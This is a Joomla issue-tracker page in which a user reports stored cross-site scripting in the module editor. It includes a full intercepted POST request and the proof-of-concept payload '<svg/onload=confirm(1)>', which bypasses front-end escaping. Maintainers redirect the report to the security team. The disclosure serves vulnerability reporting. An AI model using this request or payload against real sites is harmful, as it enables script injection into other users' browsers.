Joomla! Issue Tracker - CMS

Download
Launch
Feeling Lucky

[#31870] - Cross Site Scripting

?
avatar wsfengfan
wsfengfan
6 Jan 2021

image
image
image

POST /joomla-cms-staging/index.php/component/config/ HTTP/1.1
Host: 192.168.5.15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1898
Origin: http://192.168.5.15
Connection: close
Referer: http://192.168.5.15/joomla-cms-staging/index.php?option=com_config&controller=config.display.modules&id=83&Itemid=0&return=aHR0cDovLzE5Mi4xNjguNS4xNS9qb29tbGEtY21zLXN0YWdpbmcvaW5kZXgucGhwP29wdGlvbj1jb21fY29uZmlnJmNvbnRyb2xsZXI9Y29uZmlnLmRpc3BsYXkubW9kdWxlcyZpZD04MyZJdGVtaWQ9MCZyZXR1cm49YUhSMGNEb3ZMekU1TWk0eE5qZ3VOUzR4TlM5cWIyOXRiR0V0WTIxekxYTjBZV2RwYm1jdmFXNWtaWGd1Y0dod0wyTnZiWEJ2Ym1WdWRDOWpiMjVtYVdjdlAyTnZiblJ5YjJ4c1pYSTlZMjl1Wm1sbkxtUnBjM0JzWVhrdWJXOWtkV3hsY3lacFpEMDRNeVp5WlhSMWNtNDlZVWhTTUdORWIzWk1la1UxVFdrMGVFNXFaM1ZPVXpSNFRsTTVjV0l5T1hSaVIwVjBXVEl4ZWt4WVRqQlpWMlJ3WW0xamRtRlhOV3RhV0dkMVkwZG9kMHd5VG5aaVdFSjJZbTFXZFdSRE9XcGlNalZ0WVZkamRsQXlUblppYmxKNVlqSjRjMXBZU1RsWk1qbDFXbTFzYmt4dFVuQmpNMEp6V1ZocmRXSlhPV3RrVjNoc1kzbGFjRnBFTURSTmVWcDVXbGhTTVdOdE5EbFpWV2hUVFVkT1JXSXpXazFsYTFVeFZGZHJNR1ZGTlhGYU0xWlBWWHBTTkZSc1RUVmpWMGw1VDFoU2FWSXdWakJYVkVsNFpXdDRXVlJxUWxwV01sSjNXVzB4YW1SdFJsaE9WM1JoVjBka01Wa3daRzlrTUhkNVZtMTBhRmRHUmpCWk1HaExaR3h3ZEdKSVRtRlZWREE1
Cookie: 0f78a3a48a290132501d992011c5a490=d8ebj07g33dtmh58se3utlkjvo; joomla_user_state=logged_in
Upgrade-Insecure-Requests: 1

jform%5Btitle%5D=Side+Module&jform%5Bshowtitle%5D=1&jform%5Bposition%5D=position-7&jform%5Bpublished%5D=1&jform%5Bpublish_up%5D=&jform%5Bpublish_down%5D=&jform%5Baccess%5D=1&jform%5Bordering%5D=1&jform%5Blanguage%5D=*&jform%5Bnote%5D=&jform%5Bparams%5D%5Bprepare_content%5D=1&jform%5Bparams%5D%5Bbackgroundimage%5D=&jform%5Bparams%5D%5Blayout%5D=_%3Adefault&jform%5Bparams%5D%5Bmoduleclass_sfx%5D=&jform%5Bparams%5D%5Bcache%5D=1&jform%5Bparams%5D%5Bcache_time%5D=900&jform%5Bparams%5D%5Bcachemode%5D=static&jform%5Bparams%5D%5Bmodule_tag%5D=div&jform%5Bparams%5D%5Bbootstrap_size%5D=0&jform%5Bparams%5D%5Bheader_tag%5D=h3&jform%5Bparams%5D%5Bheader_class%5D=&jform%5Bparams%5D%5Bstyle%5D=0&jform%5Bcontent%5D=%3Cp%3EThis+is+a+module+where+you+might+want+to+add+some+more+information+or+an+image%2C+a+link+to+your+social+media+presence%2C+or+whatever+makes+sense+for+your+site.%3C%2Fp%3E%0D%0A%3Cp%3EYou+can+edit+this+module+in+the+module+manager.+Look+for+the+Side+Module.%3C%2Fp%3E<svg/onload=confirm(1)>&id=83&return=aHR0cDovLzE5Mi4xNjguNS4xNS9qb29tbGEtY21zLXN0YWdpbmcvaW5kZXgucGhwP29wdGlvbj1jb21fY29uZmlnJmNvbnRyb2xsZXI9Y29uZmlnLmRpc3BsYXkubW9kdWxlcyZpZD04MyZJdGVtaWQ9MCZyZXR1cm49YUhSMGNEb3ZMekU1TWk0eE5qZ3VOUzR4TlM5cWIyOXRiR0V0WTIxekxYTjBZV2RwYm1jdmFXNWtaWGd1Y0dod0wyTnZiWEJ2Ym1WdWRDOWpiMjVtYVdjdlAyTnZiblJ5YjJ4c1pYSTlZMjl1Wm1sbkxtUnBjM0JzWVhrdWJXOWtkV3hsY3lacFpEMDRNeVp5WlhSMWNtNDlZVWhTTUdORWIzWk1la1UxVFdrMGVFNXFaM1ZPVXpSNFRsTTVjV0l5T1hSaVIwVjBXVEl4ZWt4WVRqQlpWMlJ3WW0xamRtRlhOV3RhV0dkMVkwZG9kMHd5VG5aaVdFSjJZbTFXZFdSRE9XcGlNalZ0WVZkamRsQXlUblppYmxKNVlqSjRjMXBZU1RsWk1qbDFXbTFzYmt4dFVuQmpNMEp6V1ZocmRXSlhPV3RrVjNoc1kzbGFjRnBFTURSTmVWcDVXbGhTTVdOdE5EbFpWV2hUVFVkT1JXSXpXazFsYTFVeFZGZHJNR1ZGTlhGYU0xWlBWWHBTTkZSc1RUVmpWMGw1VDFoU2FWSXdWakJYVkVsNFpXdDRXVlJxUWxwV01sSjNXVzB4YW1SdFJsaE9WM1JoVjBka01Wa3daRzlrTUhkNVZtMTBhRmRHUmpCWk1HaExaR3h3ZEdKSVRtRlZWREE1&task=config.save.modules.apply&58921617fdc2db11481c8464ca1bd648=1

image

avatar wsfengfan wsfengfan - open - 6 Jan 2021
avatar joomla-cms-bot joomla-cms-bot - change - 6 Jan 2021
Labels Added: ?
avatar joomla-cms-bot joomla-cms-bot - labeled - 6 Jan 2021
avatar wsfengfan
wsfengfan - comment - 6 Jan 2021 
jform%5Bcontent%5D=%3Cp%3EThis+is+a+module+where+you+might+want+to+add+some+more+information+or+an+image%2C+a+link+to+your+social+media+presence%2C+or+whatever+makes+sense+for+your+site.%3C%2Fp%3E%0D%0A%3Cp%3EYou+can+edit+this+module+in+the+module+manager.+Look+for+the+Side+Module.%3C%2Fp%3E%0D%0A%3Cp%3E%26lt%3Bsvg%2Fonload%3Dconfirm%281%29%26gt%3B%3C%2Fp%3E<svg/onload=confirm(1)>
avatar wsfengfan
wsfengfan - comment - 6 Jan 2021

The editor has already escaped special characters on the front end, but uses Burp Suite to intercept the information packet to make changes, directly add XSS statements, and it executes successfully.

avatar brianteeman
brianteeman - comment - 6 Jan 2021

Security issues should NOT be reported on this repository.

If you believe you have found a security issue, please contact the Joomla Security Strike Team via email at security@joomla.org or through the contact form at https://developer.joomla.org/security/contact-the-team.html.

Please see https://developer.joomla.org/security.html for more information on how the Joomla project responds to security issues.

avatar HLeithner
HLeithner - comment - 6 Jan 2021

@wsfengfan as brian said please don't report security issues in the public tracker, I transfer the issue to the security repo thx.

And please contact the security team at security@joomla.org for feedback requests

Add a Comment

Login with GitHub to post a comment